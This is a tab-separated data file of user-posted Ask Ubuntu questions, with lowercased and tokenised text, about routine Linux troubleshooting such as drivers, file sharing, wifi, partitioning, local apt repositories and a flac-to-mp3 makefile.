429066	how to extract a vector figure from pdf	i have a question . i inserted my figure into my pdf file using latex in this way : i first created a vector figure using inkscape . then i converted it to the pdf format and then included it to pdf using latex . right now , using this generated pdf , i want to extract the previous svg figure . how can i extract it ? btw : i tried illustrator and also inkscape . however both required too many manual operations . i prefer the one which will take the pdf as input and output the svg figure .
429068	why is there a mac cd image for ubuntu ?	i was stopping by the daily build site to grab a new development cd , and my curiosity came again , why is there a mac cd image if mac 's use the same intel 64bit processor . i can only think that macs have a different bios that may not allow installation of `` normal '' installation cds . but then again , not a lot of people provide a x86_64 copy just for macs .
429070	aufs shared over smb and nfs	i am using ubuntu server 12.04 as a file server with 3 disks , two contain files and one contains parity of the others , using snapraid . i have been able to share one disk as both smb and nfs , but now i want make both disks show as one and share that . so i created a folder to mount my aufs branch : `` storage_pool '' then i added my aufs branch to my fstab file : # aufs pool system none /storage_pool aufs br : /mnt/disk1=rw : /mnt/disk2 , sum , create=mfs 0 0 from what i have understood create=mfs will put the next file written to the branch , on the disk with the most free space . thats is the way i want it to be . then i shared the folder `` storage_pool '' via smb together with each disk shared by them selves : [ storage_disk1 ] path = /mnt/disk1 available = yes valid users = nick read only = no browseable = yes public = yes writable = yes [ storage_disk2 ] path = /mnt/disk2 available = yes valid users = nick read only = no browseable = yes public = yes writable = yes [ xbmc_pool ] path = /storage_pool available = yes valid users = nick read only = no browseable = yes public = yes writable = yes i am now able to see both disks and the aufs brach from my windows desktop . i then tried to write a file to aufs branch , and noticed that it showed up on disk1 which is almost full so i expected it to show up on disk2 . i then tried write a file to the root of disk2 and shows up in the root of the aufs branch . i the created a folder on disk2 with the same name as one on disk1 , and a subfolder with a new name which contains 2 files . the new folder and files does not show up in the aufs branch . and i do n't understand why . my next question how i can share my aufs branch via nfs . my nfs bindings in fstab looks like this : # nfs4 share bindings /mnt/disk1 /nfs4/xbmc none bind 0 0 /storage_pool /nfs4/xbmc_pool none bind 0 0 and my nfs exports look like this : /nfs4 * ( rw , fsid=0 , insecure , async , no_subtree_check ) /nfs4/xbmc * ( rw , nohide , insecure , async , no_subtree_check ) /nfs4/xbmc_pool * ( rw , fsid=0 , nohide , insecure , async , no_subtree_check , crossmnt ) the share /nfs4/xbmc works perfectly but /nfs4/xbmc_pool shows up empty . i hope someone can help me , if more info is needed i 'll try and add it . i now tried to move my aufs branch mount to my /etc/rc.local instead of my fstab , like this : mount -t aufs -o br : /mnt/disk1=rw : /mnt/disk2 , sum , create=mfs none /storage_pool i then restarted my server and now the folders and files from disk2 shows up in the aufs branch . writing files to the branch still gives problems , in that it only tries to write to disk1 , when tried from my windows desktop , it reports back that there is not enough disk space , but only disk1 is full . hope someone can help me . regards nick
429071	getting error on rar extraction in ubuntu server	i have a strange problem but it could be obvious for some i compressed a file using archiver in ubuntu desktop and choose rar from the options , then i uploaded this rar file to my ubuntu server now i tried to extract this rar on my server but it fails here is what i did on my server unrar x file.rar it said ok but the file is extracted as folder unrar-free x file.rar and also said ok but extracted folder 7z e file.rar error : can not open file as archive now i have already checked my file and it can only be extracted on my desktop using archiver program or this command rar x file.rar so i tried to install rar command , but i did n't find the appropriate package for it and i think its not possible in ubuntu server as it requires desktop screen so can any one help me please ?
429072	map return key as ctrl ( when held down )	on os x i have been able to map the return key to ctrl , but only when it is held down . this can be done using the program keyremap4macbook . this is a huge help when writing in emacs , and other programs that rely heavily on the ctrl key . i have installed ubuntu 13.10 on my macbook , and i really want this functionality in ubuntu as well . i want the return key to act as normal when it is tapped , but as ctrl when held down . is there a way to do it ?
429077	is it encouraged to try to install ubuntu touch on xiaomi mi3 ?	is it encouraged to try to install ubuntu touch on xiaomi mi3 ? and if it 's not inappropriate , will it be possible to install it on the desktop ?
429081	how to properly burn and install ubuntu 13.10 from usb-stick or dvd ?	a few months ago , i 've downloaded the ubuntu 13.10 .iso file and made an usb flashdrive of it . it did not work , the boot seemed to start ( that purple screen shows up ) but not the screen asking about the language and the try ubuntu or install ubuntu options ( i call 'hello screen ' ) . at first i blamed my old notebook . old but reliable machine witch never have let me down . i 've tried several flashdrives and tried to boot several different pcs and also downloaded several .iso files . the 12.04 lts files worked just fine in the first attempt . recently my desktop box had a hard disk problem and is not mounting one of the partitions . i believe it is the '/ ' partition or the '/home ' partition . i downloaded a new copy of the .iso file and decided to burn a dvd to start the machine and try to fix it or , eventually , install the os again . after burning the dvd the same symptom ( no 'hello screen ' ) came again . my pc is not a super new machine but is far from an old one . it is an intel i7-930 with 6gb and an intel motherboard ( dx58so ) . i wonder if anyone is facing a similar problem and how to work around it so i can use 13.10 .iso file . while writing this post i am downloading and burning the 12.04 .iso file to a dvd so i can try to work around the problem of the non-mounting partition . wish me luck ! ; - ) since i 'm not an advanced user in console mode , i need quite detailed instructions , please . best regards . gil
429084	implementing unity global menu	i 'm working on a desktop ( like xfce ) as a private project , and i would like to implement the unity global menu in my desktop using python . i 've looked at the dbusmenu api and even unity 's dbus `` registrar '' itself and i 'm still lost . how do i go about implementing my own appmenu-indicator ? do i need to implement my own `` appmenuregistrar '' or can i reuse ubuntu 's libraries and services ?
429085	how do i get my dashboard to advise anything but 'sorry , there is nothing that matches your search ' ?	the statement sorry , there is nothing that matches your search comes as a result ( virtually invariably ) upon my entering just about anything in the command line or search string in dashboard . this is a problem , because it prevents me doing much of anything - including anything sudo.. ( for example sudo ufw status or sudo apt-get install unattended-upgrades . seems therefore to be an important wall i just ca n't seem to get through , over , under , or around . i 'm extremely new to ubuntu ( ver . 12.04.4 ) , but have been using pcs for about 28 years , so i 'm familiar with dos and comfortable issuing commands in that manner - but i ca n't seem to get in the front door or to get the dashboard 's attention . i tried unity -- replace & , installed unity-place-applications and also unity-place-files as well to no avail . is there an easier , more direct way to sort this out ( or do i just need to re-install the software ) ?
429087	ubuntu 12.04 boots on terminal only	i 've run into many problems using an xi3 computer . originally , ubuntu 12.04 ( kernel 3.4 ) refused to boot unless i set acpi=off from grub , suggesting a hardware problem . things seemed to be working fine for a bit , but then ubuntu would hang at the login screen indefinitely , and i would only be able to boot from recovery mode . after reading many threads posted by other users , i learned that the graphics driver was likely incompatible with the my current kernel version , so i updated the kernel to 3.11 . unfortunately , now whether i boot from recovery or not , i only see the ubuntu loading screen with 5 dots . i checked lshw and my display was listed as unclaimed , but even after downloading the open source and proprietary drivers for my graphics card ( on separate occasions ) , i ca n't access a normal display . after some installations , the `` unclaimed '' designation disappeared next to display , but that did n't seem to change anything . i 've tried many fixes ( hopefully without ruining anything ) like updating the desktop , etc . i have code that i 'm not entirely sure is backed up elsewhere , so ideally i do n't have to do a fresh install of ubuntu 12.04 again . sorry if i 'm leaving anything out ; i 'll be sure to update the question as soon as possible . graphics card : radeon hd 3200
429088	after installing amd drivers from website and reboot i go into low graphics mod	i am a new ubuntu , more specifically , linux user . i installed ubuntu 12.04 lts alongside windows 7 ( not using wubi ) . when i was in ubuntu i went into additional drivers and installed a proprietary driver . it rebooted correctly but when i checked additional drivers again and it said that the driver was activated but it can not be used . also at the time i had trouble when waking up from suspend , everything froze . i read that i should update my drivers , so i uninstalled the driver that was in additional drivers , then rebooted and went into the amd website and installed the driver from there . i ran the file in the terminal and then .exe installer opened and followed the instructions , then i rebooted . it rebooted in the low graphics mode . it didnt now what to do so . i decided to click the run in low graphics mode only once option . it opened the console and it told me to log in . i kept putting my username and password and it said incorrect . my username had space between both words , i now realize that linux shortens the username . bob smith = bobs ? am i correct ? at the time i did not know this so i press ctrl + alt + f7 , to try to go to the desktop . instead of loading the desktop it loaded up the console and it said `` starting atieventsd '' and something called daemon . i stood there a few seconds everything said ok so i pressed enter , it didnt work , so i held down the power button on my laptop and just when it was about to turn off some text appeared in the console . how do i fix this ? will this affect my windows 7 partition ? will this affect the bios ? should i just uninstall ubuntu 12.04 lts ? specs : hp probook 4530s intel core i5-2450m 2.50ghz amd radeon hd 7470m 8gb ram
429092	can ubuntu server be installed on < 1g hds ?	i just need to install a streaming server , but videos to be streamed are on a remote storage . i just need the ubuntu server hd take as less space as possible to be portable ( ubuntu server will be on a vm , so hd is just a file ) . i read that the minimum is 1gb but it still seems too big for my tastes and for what i have to do . i was thinking about 512 mb , it would be great ... but will istall allow me to do so ? and even if i try some workaround the server will be ok ? if not , sorry if i ask here , what distro could do the job ?
429093	problems after trying to install libvideocss1	i installed restricted extras into my ubuntu 12.04 lts , then tried to install libvideocss without realizing the medibuntu project was now defunct . now the software center crashes on startup not opening at all , and i cant install anymore software . when i try to install anything or get updates i get this in return : e : type ' < html > < head > < meta ' is not known on line 1 in source list /etc/apt/sources.list.d/medibuntu.list e : the list of sources could not be read . not sure how to fix this please help . new to ubuntu .
429094	matching vulnerabilities with upstream versions	how am i supposed to match vulnerabilities with services fingerprint with ubuntu ( and debian ) upstream 's version ? is there a public database to match these versions with original versions ? 5.5.29-0ubuntu0.12.04.1 5.5.29-0ubuntu0.12.04.2 5.5.31-0+wheezy1 5.5.31-0ubuntu0.12.04.1 5.5.31-0ubuntu0.12.04.2 5.5.31-0ubuntu0.13.04.1 5.5.33-0+wheezy1 5.5.33-cll-lve 5.5.34-0ubuntu0.12.04.1 5.5.34-0ubuntu0.13.04.1 5.5.34-0ubuntu0.13.10.1 thank you
429096	how to install english version of texmaker/texstudio ?	i installed texmaker , and later texstudio , on my pc . each time german versions of the programs were installed . a possible reason may be that i am in germany . however , i need english version of one of these programs . any help , please ?
429099	edges of some windows running across workspaces in unity	i like to use the compiz grid keyboard shortcuts to put windows on the left half and right half of my screen . but i 've noticed that when running programs like gvim or the terminal , which require their widths to be a multiple of the character width , if i put a window to the right half , the edge of it sticks out a tiny bit into the next workspace . ideally , i 'd like to prevent windows from sticking across workspaces like that , but i 've seen this related question and i guess it 's just not possible with unity . ( i do n't know if this has changed since that question was asked , or since 12.04 , which is what i 'm using , but if it has , let me know ) but is there any way i can modify the behavior of the grid so that i can make ( preferably only for some programs ) windows a little bit narrower when put on the right side of the screen ?
429100	i ca n't log in on partypokers website why is that ?	long time user first time question asker . i am an avid online poker player , but for some reason can not play my site of chioce within the browser with ubuntu . i can do it with my windows machine , but not my ubuntu . i have tried opera , firefox , chrome , chromium all to no avail , every time the login screen is missing/blank . i have all permissions set and up to date java.does anyone else know how to fix this or have this problem ? i have supplied the link to the site as this is not a link share promotion or anything , i just want to be able to play , i tried to post screen shots but said i need 10 reputation http : //www.partypoker.com/play-now.html
429101	amd hardware compatibily for home-server based on ubuntu 12.04	i 'll like to buy and setup a new home server with ubuntu server edition 12.04 . i 'm thinking to buy a amd fx8300 and some am3+ motherboard.which one to choose ? there 's any compatibility issue with that processor or am3+ socket ? can you suggest me a compatible hardware ? thanks
429109	how do i find out what ubuntu distro was originally installed on a machine ?	i 'd like to know which ubuntu distro is installed on my laptop . i know that it is precise pangolin , but is it xubuntu , lubuntu , plain ubuntu or something else ? when i run the usual lsb_release -a command , it says `` ubuntu '' , but running the same command after having booted from a lubuntu installation usb-stick gives the same answer , so that is obviously not the answer . is there another command that will tell me the answer ? ( or some other means ? ) p.s . the gui settings have been changed , so i can not simply identify the look of the desktop visually . p.p.s . i found several questions on this topic , but they all seem to answer the question which version of ubuntu is installed . note that this is not what i 'm asking for .
429111	how can i have a good html report about my computer specifications ?	is there a command to export my system specification to html page , so i can open it a view all my system specification in a well recognized view . any help ?
429114	how do i download ubuntu for phones	i am wondering how do i download ubuntu for the google nexus 5 , and have they released an official os yet or is it still the beta ?
429119	how to convert files with make preserving the directory structure	i 'd like to use makefile to convert my flac music into mp3 . the idea is : have the same directory structure with a different root name run a simple command to keep the mp3 folder in sync with the source not bother if i have already or not converted the file : just run make for updating copy other files ( such as covers ) apparently it was not as difficult but i had some issues with file and directory names . in general album and song names contain many weird characters ( spaces , ; ' and others ) . after some trials i was able to get something working . thus actually this is not exactly an answer , since my solution seems enough generic and it can be applied for other situations ( like converting video , pictures and so on ) i 'd like to share it . # generic make file to convert formats # creates a target directory structure as the source # ( ex : for converting music ) # # warning : current limitations : # does not support `` ; '' in file or dir names # does not support two consecutive spaces in dir or filename # ( may be others ) # input/output extension intype : = flac outtype : = mp3 copytype : = jpg # input/output direcory indir : = musica-flac outdir : = musica-mp3 # convert commands ( find a better solution using a single var ) convert1 : = flac -cd convert2 : = lame - -b 320 # find target by changing dir name and file extension # replace spaces with escaped spaces target : = $ ( shell find $ ( indir ) -type f -name '*. $ ( intype ) ' | \ sed -e 's/ /\\ /g ' -e s/ $ ( indir ) / $ ( outdir ) / -e 's/\. $ ( intype ) /. $ ( outtype ) / ' ) copyfile : = $ ( shell find $ ( indir ) -type f -name '*. $ ( copytype ) ' | \ sed -e 's/ /\\ /g ' -e s/ $ ( indir ) / $ ( outdir ) / ) all : $ ( target ) $ ( copyfile ) space : = space+= # secondary expansion needed to change direcorty # and to replace spaces with escaped spaces # use quoted variables in commands ( to manage spaces ) .secondexpansion : $ ( target ) : % . $ ( outtype ) : $ $ ( subst $ $ ( outdir ) , $ $ ( indir ) , $ $ ( subst $ $ ( space ) , \ $ $ ( space ) , % ) ) . $ ( intype ) @ mkdir -p `` `dirname `` $ @ '' ` '' @ $ ( convert1 ) `` $ < `` | $ ( convert2 ) `` $ @ '' .secondexpansion : $ ( copyfile ) : % : $ $ ( subst $ $ ( outdir ) , $ $ ( indir ) , $ $ ( subst $ $ ( space ) , \ $ $ ( space ) , % ) ) @ mkdir -p `` `dirname `` $ @ '' ` '' @ cp `` $ < `` `` $ @ '' any feedback or idea for improvement is welcome . cheers .
429120	no way i can get my graphics card ( intel/amd hybrid ) working with ubuntu 13.10	the laptop is a dell inspiron 17 3737 with intel hd graphics 4400 . the system testing tool keeps telling me that there is no loaded video driver and the graphics looks like a 4 bits color scheme with almost unreadable fonts . how can i get acceleration working ? notebook : dell inspiron 17-7737 ( inspiron 17 series ) processor : intel core i5 4200u graphics adapter : nvidia geforce gt 750m
429121	remove firefox titlebar in ubuntu 13.10	i have installed cinnamon on my ubuntu 13.10 . i want to know if it is possible to remove that fiferox title bar above tabs . i have installed htitle and the 3 buttons now appear like on a windows version , but the titlebar still visible . any suggestions ? thank you .
429129	formating hard drive	i wish to remove ubuntu from my computer and reinstall windows 7 . how do i remove the ubuntu os from my hard drive ? ing system . how do i how can i format my hard drive to remove all os and start fresh . i want to replace ubuntu with windows .
429130	ubuntu partition resize help	here 's what my current partition table looks like : now , i 'd like to increase the size of my ubuntu partition ( /dev/sda8 ) to , say , 20 gb . but it seems to me there 's no way to do that other than deleting everything and starting anew , which makes me scared ( do n't want to lose all the settings and good stuff ) . when i tried to do this via the gparted editor in boot mode , it warned that moving partitions will mess up the bootloader and operating systems and what not , so i did n't do it . i 'm a total noob , so am requesting someone to help me achieve this . thanks !
429131	acer c720 touchpad fix support without kernel modification ?	i have 13.10 x86 ( stock install ) running and working well in legacy boot mode on my chromebook . i have read several posts about modified kernel fixes ( see http : //ubuntuforums.org/showthread.php ? t=2190187 ) however i 'd rather not use that method . is there an alternative way to apply this fix ( i do not want to use chrubuntu or crouton ) builds . perhaps this will be included in the upcoming trusty tahr ?
429132	can i use bind9 as a dns to resolve to an external ip ?	question says it all . i have a digital ocean ip address and i want to know if i can use bind9 to resolve a registered domain on a completely different network/ip ? if not , what can i use ? thanks !
429134	create multiple ubuntu machines that are identical	i have four questions . i need to create exact machine clones . in short , i 'm considering this approach : 1 ) install a base level ubuntu from a dvd ( say 12.04.3 ) on each clone 2 ) replace the /etc/apt/sources.list on each clone with my own version of the file that has a single entry that points to a local server ( say it 's called `` master '' ) on our network 3 ) apt-get upgrade each clone from that master server a bit more detail : to create the repository and add all the packages on that local server , i have seen this post : how to make my own local repository ? question 1 : is this approach ok ? or am i completely off-base ? he says to use this line : deb file : /my_repo/ ./ where /my_repo is where i 've stored all of the specific packages i want . and this post says i can use an ftp : /xx format : http : //manpages.ubuntu.com/manpages/hardy/man5/sources.list.5.html which means i only have to install an ftp daemon on the server . question 2 : is this correct , i.e . just ftp daemon and a single line in the sources.list ? to initially populate the directory with packages , i can just scp -r me @ some_well_configured_machine : /var/cache/apt/archives /my_repo/ or on the master machine : cp -r /var/cache/apt/archives /my_repo that is , i can do a full directory tree copy from some other good machine or even from the master machine itself . question 3 : am i correct ? ( i.e . a simple directory tree copy ? ) every once in a while , to update the /my_repo/ directory on the master server with the latest ubuntu packages : i update the master machine from the official ubuntu repositories copy the updated packages now in /var/cache/apt/archives into the /my_repo/ directory on each clone machine , apt-get upgrade question 4 : will this work ? is there a better or simpler way ? update : the focus of all of this is having control of the changes made to these machines . so hard disk cloning/ghosting wo n't work in this case . once the machines are built , i need them to stay the same even if someone does an `` apt-get upgrade '' . stay the same , that is , until i change the master ( then after an upgrade of all of the machines , they are the same again ) .
429137	ubuntu is not recognizing my keyboard	i installed ubuntu 12.04 on my lg laptop with windows vista with 2mb ram . i do not know what i did wrong but the keyboard is not working so i can not log in for internet and or anything else . do i have to download some additional software or is this just a glitch ?
429138	ubuntu installation 12.04.4	i have 2 separate hard drives . one is sata the other ide . windows 7 is installed on sata drive and the other is a blank ide hard drive . how can i install ubuntu on the second ide hard drive without removing or overwriting windows 7 installed on the 1st sata drive ? i want to be able to dual boot between windows 7 and ubuntu 12.04.4
429139	why am i not able to copy and paste with the center button of my mouse ?	i just reinstalled kubuntu 13.10 and found that the mouse will not copy and paste after selecting and pressing the center button . how do i fix this ?
429143	how to get rid of the no_pubkey 977c43a8ba684223 and `` sometiing wicked happend resolving 'us.old-release.ubntu.com	every time i tried to update my ubuntu 12.04 i am getting this : failed to download repository information w : gpg error : http : //download.opensuse.org release : the following signatures could n't be verified because the public key is not available : no_pubkey 977c43a8ba684223 , w : failed to fetch http : //us.old-releases.ubuntu.com/ubuntu/dists/precise/release.gpg something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) and so on so forth ... is it related to owncloud installation ? after i tried to install owncloud and unsuccessfully uninstall it , i am getting the error message whenever i update ubuntu . i have tried these two commands : sudo apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys 3c962022012520a0 sudo apt-get update but the problem still exists . would you please help ? thank you !
429144	error while installing catalyst 13.1 on ubuntu 13.10 64 bit	i have gallium 0.4 on amd rv730 intel® core™2 duo cpu p7350 @ 2.00ghz × 2 advanced micro devices , inc. [ amd/ati ] rv730/m96 [ mobility radeon hd 4650/5165 ] i downloaded the amd catalyst™ 13.1 proprietary linux x86 display driver i unpacked it and then made these xxx @ xxx : ~/downloads $ sudo sh amd-driver-installer-catalyst-13.1-legacy-linux-x86.x86_64.run -- buildpkg ubuntu/saucy created directory fglrx-install.lw2suh verifying archive integrity ... all good . uncompressing amd catalyst ( tm ) proprietary driver-8.97.100.7 ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ===================================================================== amd catalyst ( tm ) proprietary driver installer/packager ===================================================================== generating package : ubuntu/saucy package /xxx/xxx/xxx/fglrx_8.970-0ubuntu1_amd64.deb has been successfully generated package /xxx/xxx/xxx/fglrx-dev_8.970-0ubuntu1_amd64.deb has been successfully generated package /xxx/xxx/xxx/fglrx-amdcccle_8.970-0ubuntu1_amd64.deb has been successfully generated removing temporary directory : fglrx-install.lw2suh i get an error when i install the package xxx @ xxx : ~/downloads $ sudo dpkg -i fglrx*.deb selecting previously unselected package fglrx . ( reading database ... 194458 files and directories currently installed . ) unpacking fglrx ( from fglrx_8.970-0ubuntu1_amd64.deb ) ... selecting previously unselected package fglrx-amdcccle . unpacking fglrx-amdcccle ( from fglrx-amdcccle_8.970-0ubuntu1_amd64.deb ) ... selecting previously unselected package fglrx-dev . unpacking fglrx-dev ( from fglrx-dev_8.970-0ubuntu1_amd64.deb ) ... setting up fglrx ( 2:8.970-0ubuntu1 ) ... update-alternatives : using /usr/lib/fglrx/ld.so.conf to provide /etc/ld.so.conf.d/x86_64-linux-gnu_gl.conf ( x86_64-linux-gnu_gl_conf ) in auto mode update-alternatives : warning : skip creation of /etc/opencl/vendors/amdocl32.icd because associated file /usr/lib/fglrx/etc/opencl/vendors/amdocl32.icd ( of link group x86_64-linux-gnu_gl_conf ) does n't exist update-alternatives : using /usr/lib/fglrx/alt_ld.so.conf to provide /etc/ld.so.conf.d/i386-linux-gnu_gl.conf ( i386-linux-gnu_gl_conf ) in auto mode update-initramfs : deferring update ( trigger activated ) loading new fglrx-8.970 dkms files ... first installation : checking all kernels ... building only for 3.11.0-17-generic building for architecture x86_64 building initial module for 3.11.0-17-generic error ! bad return status for module build on kernel : 3.11.0-17-generic ( x86_64 ) consult /var/lib/dkms/fglrx/8.970/build/make.log for more information . update-initramfs : deferring update ( trigger activated ) processing triggers for ureadahead ... ureadahead will be reprofiled on next reboot processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf-2.index ... setting up fglrx-amdcccle ( 2:8.970-0ubuntu1 ) ... setting up fglrx-dev ( 2:8.970-0ubuntu1 ) ... processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.11.0-17-generic processing triggers for libc-bin ... make.log contains dkms make.log for fglrx-8.970 for kernel 3.11.0-17-generic ( x86_64 ) mon mar 3 19:49:08 cst 2014 amd kernel module generator version 2.1 kernel includes at /lib/modules/3.11.0-17-generic/build/include not found or incomplete file : /lib/modules/3.11.0-17-generic/build/include/linux/version.h i 'm following this guide : binarydriverhowto/amd and i 'm stuck i am completely at a loss here . i 'd really appreciate any help .
429147	ca n't install ubuntu from usb stick on macbok air	yesterday i tried to download ubuntu with these steps on a macbook air ( 6,2 ) . i got to the grub loader and selected to install ubuntu . i assumed that this would work , so i ( impulsively ) removed the os x and continued with the installation . then , after it installed , it told me to restart . except , when i restarted and the usb stick was out , there was no boot loader , so obviously it did n't install properly . when i insert the usb stick , i 'm able to `` try ubuntu without installing '' , but not able to install it . additionally , when i `` try ubuntu '' , wifi does n't work , so i have to use a usb-to-ethernet .
429148	how do i remove xfce from my computer ?	my computer is overheating because i got too many desktop environments installed like : mate , cinnamon and xfce . i uninstalled them , but xfce failed to uninstall . i get this error . sudo apt-get purge xfce4 reading package lists ... error ! e : problem syncing the file - sync ( 5 : input/output error ) e : the package lists or status file could not be parsed or opened .
429150	how to recover forgtten password	i forgot my ubuntu password . and now while trying to recover it using recovery mode i am not able to do so . when i uses the command > ls /username its doesnât show anything except oem . how can i reset it now please help
429152	acer aspire v3 471 do n't detect wifi driver	my laptop is acer aspire v3 471 . ubuntu 13.10 is installed and dual booted with windows 8 . after installing ubuntu , it doesnât recognize wireless drivers . please someone help .
429154	ca n't connect to samba server with ubuntu ( nt_status_unsuccessful ) or windows 7	i have the samba daemon running on my server , and have successfully connected to it from the ubuntu machines in my schools computer lab . however , when i try to connect to it from either my windows or ubuntu box at home , i am unsuccessful . in the case of ubuntu , i receive the error `` nt_status_unsuccessful '' . my googling has n't turned up any relevant solutions , and i 'm not really sure how to go about dealing with this . the command i am running is : smbclient -u < my username > // < my server 's ip > / < the share name >
429156	hdparm - version that accepts non-ascii characters for ata passwords	i 'm looking for a way of using hdparm to unlock my drive . simple enough you would think once you have the password ? nope , the password , thanks dell , contain non-ascii characters . i have the password in hex , so $ ( print '\x2e\x20 ' ) shows up in hdparm as something like password = 'squiggle no closing to the ' so is there a version of hdparm i can use ? maybe one that accepts a file for the password perhaps ? or even the instructions on how to download source hdparm & a diff file for the changes i need to make to the security commands to allow file usage ? oh and then how to erm build/make/replace/use the new hdparm ( renamed ? ) a guide of some variety would be great , as although i have some idea of what i am doing , it takes ages to google for the 'little steps ' that a *nix user 'just should know ' .
429157	i do n't get this message : `` if you have linux installed , please reinit its boot loader ''	i just used paragon partition manager free edition 2014 on my windows 8 to transfer space from one of my windows logical partition to my ubuntu linux partition ( i have only one partition for ubuntu ) . after the operation , the software gave me a message : `` if you have linux installed , please reinit its boot loader '' . i do not know how i am supposed to reinit its boot loader or what exactly a boot loader is ( besides grub ) . so , what do i do before i reboot my computer . i am not fond of broken loading screens .
429159	12.04 lts login loop	i had ubuntu 12.04 lts installed as dual boot on a macmini ppc 1.25 ghz . i ran upgrade/update , but after reboot i am stuck in a login loop with user and guest . the terminal login is successful . the command : sudo chown -r user : user /home/user returns no such files found .
429161	command-line control login remotely from another computer	i need a way to get command-line control of a computer remotely , from another computer . that is , i need a secure way to log in from another machine on the network using a terminal .
429162	dvd-rom and dvd-r not recognized by xubuntu	relatively new to the xubuntu game ( was recently gifted an archaic dual-core desktop that i 'm trying to make my plex server ) . i have tried finding the dvd drive on the directory and only found cdrom , which , following the commands , is still not showing up alongside the floppy disk drive on my desktop . so unfortunately this did n't help : ubuntu wo n't recognize dvd drive and since i ca n't rightly find the drive by browsing the folders , i 'm almost positive this is not a codec problem . i 'm not trying to play the movies anyway , just rip them . i do n't know if any problems like this can even be specific to xde , or what . i installed the os from the drive in question , i have n't the slightest why it would disappear . thanks for taking a look !
429165	how to install mozilla central in linux ?	i have downloaded the mozilla-central from here . how to install mozilla central in linux . i am unable to find the correct document .
429167	unable to launch application on the second monitor	i have installed ubuntu on vmware workstation 10 , and my laptop connect to another monitor . the dual monitors look work well , i can drag a window to the second monitor . however , when i use command line to launch a program on the second monitor like this : display= '' :0.1 '' chromium-browser it will show a error like gtk-warning ** : can not open display : :0.1 it works fine in my first monitor using this command display= '' :0.0 '' chromium-browser i do n't know whether the vm causes the error .
429169	problem while installing ubuntu server	i have been trying to make ubuntu cloud , and for that i need a ubuntu server . but after the whole installation my screen goes blank and a blinking cursor appears . i am installing from live cd . during installation it does not ask anything about the option for primary partition and about the grub boot loader ( wheather to load it at the mbr ) .
429173	the future of unity	i used 10.04 for work for a couple of years and found it to be awesome . then someone convinced me to upgrade to 12.04 because unity looked good . after wrestling with it for about 6 months i decided to go back to mate temporarily until a new desktop interface had been designed . it looks like the up-coming 14.04 still uses unity . i 'm interested in finding out whether canonical is continuing to pursue the unity desktop ? if the strategy is going to persist , then i 'm interested in discovering what the best tools are to mitigate it 's affects on desktop usability ? a few years back there was a tweak tool , but it was n't very comprehensive . i 'm hoping that the scope of customizability has improved over the last couple of years ? thankyou .
429175	intel corporation centrino wireless-n 1000 connection drops infinite times	i have a laptop with a network controller : intel corporation centrino wireless-n 1000 [ condor peak ] . here is the adapter information : stan @ pho : ~/downloads $ lspci | grep -i net 02:00.0 network controller : intel corporation centrino wireless-n 1000 [ condor peak ] 04:00.0 ethernet controller : marvell technology group ltd. yukon optima 88e8059 [ pcie gigabit ethernet controller with avb ] ( rev 11 ) the adapter gets connected , an it gets immediately disconnected . and that is repeated infinite times . the output of dmesg | egrep 'wlan0|iwl ' show the following lines multiple times : [ 1752.722768 ] wlan0 : authenticate with 20 : aa:4b : cb:40:94 [ 1752.743331 ] wlan0 : send auth to 20 : aa:4b : cb:40:94 ( try 1/3 ) [ 1752.750735 ] wlan0 : authenticated [ 1752.754666 ] wlan0 : associate with 20 : aa:4b : cb:40:94 ( try 1/3 ) [ 1752.758641 ] wlan0 : rx assocresp from 20 : aa:4b : cb:40:94 ( capab=0x411 status=0 aid=2 ) [ 1752.763976 ] wlan0 : associated [ 1801.420240 ] wlan0 : deauthenticating from 20 : aa:4b : cb:40:94 by local choice ( reason=3 ) it seems the most common solution is to disable the n mode from the wireless card , so i tried this : sudo modprobe -r iwldvm sudo modprobe -r iwlwifi sudo modprobe iwlwifi 11n_disable=1 but it is still not working . update : i can confirm that the issue is related to the wireless n mode . if i go to the admin page of my router and configure it to only use wireless b/g mode , then my computer can keep a connection with the router . so , i guess there is something wrong with the commands i typed to disable n mode in the wires adapter of my computer . any idea what am i missing ?
429179	how to take an image of the entire hard disk ?	i am using ubuntu 12.4 i like to take an image of entire hard disk is there any software for this operating system or we can take image through norton ghost ?
429180	how to enable quick start button in lenovo s100 ideapad using ubuntu 12.04	i 'm using lenovo s100 ideapad with ubuntu 12.04 64 bit version . after turnoff the system when i press quickstart button it not boot and notice : '' quickstart is not install on your computer or not install quickstart ... to use please install lenovo quick start install '' . how can i use the qs button ?
429182	ubuntu network on startup	network on my ubuntu 12.04 is not getting initialized at startup . how can i force ubuntu to initialize network upon start-up ? i am new to ubuntu and have very limited understanding of files like /etc/init.d and /etc/bashrc files etc . right now , i am manually running this command every time from the terminal , after start up sudo service network-manager restart i am sure there are much more sophisticated solutions to this problem . any help is welcome .
